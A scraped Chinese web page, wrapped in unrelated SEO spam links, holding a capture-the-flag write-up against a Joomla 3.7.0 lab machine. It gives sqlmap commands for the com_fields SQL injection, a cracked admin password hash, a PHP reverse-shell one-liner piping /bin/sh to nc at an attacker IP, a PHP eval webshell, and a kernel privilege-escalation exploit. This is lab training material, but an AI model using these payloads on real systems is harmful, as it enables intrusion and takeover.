当前位置: 首页 > wzjs >正文

网站免费模板制作无锡市政建设集团网站

网站免费模板制作,无锡市政建设集团网站,西安网站空间,建湖做网站找哪家好1. 靶机介绍 主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权 信息收集(ip、端口、目录、指纹信息)--->利用漏洞--->反弹---->提权 2. 信息收集 2.1. 扫描存活 ip 192.168.220.134 2.2. 端口扫描 nmap -T4 -A -p- 192.168.220.134 …

1. 靶机介绍

主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权

信息收集(ip、端口、目录、指纹信息)--->利用漏洞--->反弹---->提权

2. 信息收集

2.1. 扫描存活 ip

192.168.220.134

2.2. 端口扫描

nmap -T4  -A  -p-  192.168.220.134

通过对端口扫描,发现对外开放了 80 端口,然后进行访问

还发现了当前主机的 CMS 是 Joomla

2.3. 敏感目录扫描

nikto  -h  192.168.220.134

administrator/index.php

通过对敏感目录扫描,可以发现后台管理的登录页面,尝试访问:

2.4. 通过 joomscan 扫描相关的漏洞

​
joomscan  --url  http://192.168.220.134​

2.5. 扫描 joomla存在的漏洞

searchsploit Joomla 3.7.0

结合漏洞的文件名叫 42033.txt,查找这个文件所在的具体位置

find / -name  "42033.txt"

查看文件的内容

cat  /usr/share/exploitdb/exploits/php/webapps/42033.txt

3.漏洞利用

3.1. sql 注入漏洞

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

利用提供的 sqlmap 进行数据库爆破

sqlmap -u "http://192.168.220.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://192.168.220.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

sqlmap -u "http://192.168.220.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T  '#__users'   --columns -p list[fullordering]

sqlmap -u "http://192.168.220.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T  '#__users'   -C 'name,password'   --dump -p list[fullordering]

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

此时获取到账号和密码,但是密码被加密了

可以通过 kali 内置的 john 工具进行解密,首先需要将密文保存在一个 txt 文件中

vim jop.txt
john --show  jop.txt

得到密码是snoopy

用户名admin

登录

3.2. shell 反弹

可以发现这个区域能够写入 php 代码,此时可以联想,1.可以写一句话木马,然后通过蚁剑连接,2.进行 shell 反弹,此时我们可以先新建一个 shell.php 文件,然后写入反弹的 shell

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.138 6666 >/tmp/f');?>

在 kali 中开启 nc 监听

nc -lvp 6666

接下来需要访问 shell.php 文件

http://192.168.220.134/templates/beez3/shell.php

使用 python 脚本设置命令行

python -c 'import pty;pty.spawn("/bin/bash")'

接下来尝试使用用户提权,发现行不通

sudo  -l

可以尝试使用操作系统提权方式,先查看操作系统的版本信息

cat  /etc/issue

3.3. 发现操作系统的漏洞

接下来搜索操作系统的漏洞

searchsploit   Ubuntu 16.04

Privilege Escalation 权限升级

searchsploit -p linux/local/39772.txtcat /usr/share/exploitdb/exploits/linux/local/39772.txt

3.4. 利用操作系统漏洞

需要通过这个 39772.zip 这个压缩包来进行提权

在本地下载这个文件,然后通过蚁剑进行上传

首先先需要创建一个 one.php 文件并写入一句话木马

<?php  @eval($_POST[123])?>

需要访问这个 one.php,让木马生效

接下来使用蚁剑来进行连接

进入服务器内容进行压缩包的解压

cd 39772lstar -xvf exploit.tar

3.5. 利用工具进行提权

进入目录并执行文件,最后提权成功

cd ebpf_mapfd_doubleput_exploit./compile.sh./doubleput

3.6. 找到最终的 flag

进入/root 目录,最终进行提权

cd  /rootcat  the-flag.txt

http://www.dtcms.com/wzjs/547745.html

相关文章:

  • 网站改版的形式大致有nginx wordpress 目录 伪静态
  • 学做预算网站网站没有问题但是一直做不上首页
  • 网站开发 站长统计3g手机网站源码
  • 淮安市哪里有做网站wordpress 微信主题下载
  • 布吉商城网站建设基本流程wordpress 谷歌竞价
  • 登录网站定制哪些人是建网站的
  • jsp网站建设模板下载龙岩有什么兼职可以做
  • 青岛黄岛区建设工程管理局网站企业网站的建设 摘要
  • 网站做sem推广时要注意什么恩施网站设计
  • 注册公司登陆哪个网站建站专业定制
  • 使用aspx做电影网站seo外包公司优化
  • 写作网站投稿平台做网站开专票税钱是多少个点
  • js素材网站三七游戏官网
  • 高端网站定制商京东 推广网站怎么做
  • 网站搭建大型公司微信开放平台如何注销
  • 建设领域信用系统网站网站怎么做移动图片不显示不出来
  • 怎么做中英文双语网站沧州软件开发公司
  • 南昌市公司网站建设不知名网站开发
  • 做网站的详细步骤企业关键词优化公司
  • 电子商务网站建设课外实训seo技术外包公司
  • 海报素材库网站免费为什么外包会把人干废
  • 潍坊企业建站系统蛋挞怎么做制作方法
  • 百度seo排名曝光行者seo哪些网站可以做seo
  • 婚庆公司网站建设策划书搜索关键词排名推广
  • 做个小型购物网站要多少钱昆明企业做网站
  • 建设网站主机网站转化分析
  • 搭建网站有什么用河北工商注册网入口
  • 定制开发网站织梦猫网站模板
  • 想做个网站怎么做免费1级做爰网站
  • 网站优化培训好学吗wordpress添加关键词描述